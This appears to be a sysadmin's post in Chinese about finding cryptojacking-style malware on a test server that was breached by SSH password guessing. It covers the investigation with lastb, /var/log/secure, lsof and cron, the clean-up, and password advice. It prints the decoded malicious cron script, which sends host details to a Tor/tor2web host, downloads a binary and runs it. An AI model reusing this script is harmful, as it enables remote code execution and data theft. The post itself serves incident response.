偶然上測試服務器看了下top命令
好傢伙從哪蹦出來的進程。 肯定不是自己業務的進程。
正好登錄的時候提上次訪問失敗,其中ip沒見過。
通過lastb -n 500 查看了下500條登錄密碼失敗的信息 。全是不知道的ip。
爲了確認服務器被攻擊 有看了下 /var/log/secure 好傢伙全是嘗試密碼錯誤的錯。往下看 還有Accept的信息。媽的密碼被破了。 測試環境服務器密碼比較簡單。
kill 調這個進程之後發現 過一會又出來了。 於是通過 lsof -p 、 ps-ef 查看可以進程。還真有那麼幾個。 發現定時任務還有莫名的定時
於是刪掉他 ,去 /etc/cron.d 、cron.daliy等一系列的定時目錄下 發現也有如上定時。都刪掉。
但是 一會他媽的 定時 進程又都全出來了。肯定還有進程沒殺掉。一番百度說是可能 系統命令被改了。 於是照着百度對了一下 發現貌似沒被改。
然後說看下history 有沒有啥被操作的命令。也沒有。
又lsof -p 異常進程號 發現 連着一個國外的ip 然後感覺跟/tmp/.X11-unix/ 這個目錄有點關係。但是也不知道有啥關係。
心有不甘,又看了下這個定時的腳本。裏面用base64加密了 。解密過後一大段腳本 每太看懂。
OqjuIoCgeYi7FF1EOxx86EQg7bzMbdMI
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin
d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "p7ffujbc65hzuzrgtxxvtux2e4wxtb73twgrarcog2umzvcpmw4qkryd")
sockz() {
n=(doh.this.web.id doh.post-factum.tk dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}
fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}
u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}
for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done
腳本如上。感覺 tmp/.X11-unix/裏面有點東西啊 。看了下 裏面有 01 11 22目錄
對比正常的服務器沒有這些 於是打開看了下 貌似進程號。於是都查找了一下 發現確實有沒關閉的進程。
於是把所有相關進程都kill掉。腳本 定時全刪掉。貌似沒啥問題了。但是還有沒有深層次的問題 還真不知道。
反正資源沒被佔用了。 最後服務器的密碼一定要複雜。除非不重要的服務器(可以隨時重裝)。ssh端口最好也改了(如果對外暴露的)。
最最後這個木馬還在局域網內瘋狂的傳播。被破解的機器也成木馬源去攻擊別人的電腦了。密碼簡單的服務器都被破了。相反密碼複雜的服務器沒啥毛病。 向領導彙報吧 找大神解決。 還裝了個殺毒軟件 clamv 沒啥用 沒掃出來。可能不是病毒就是一般的木馬腳本
PS:我這是被傳染的。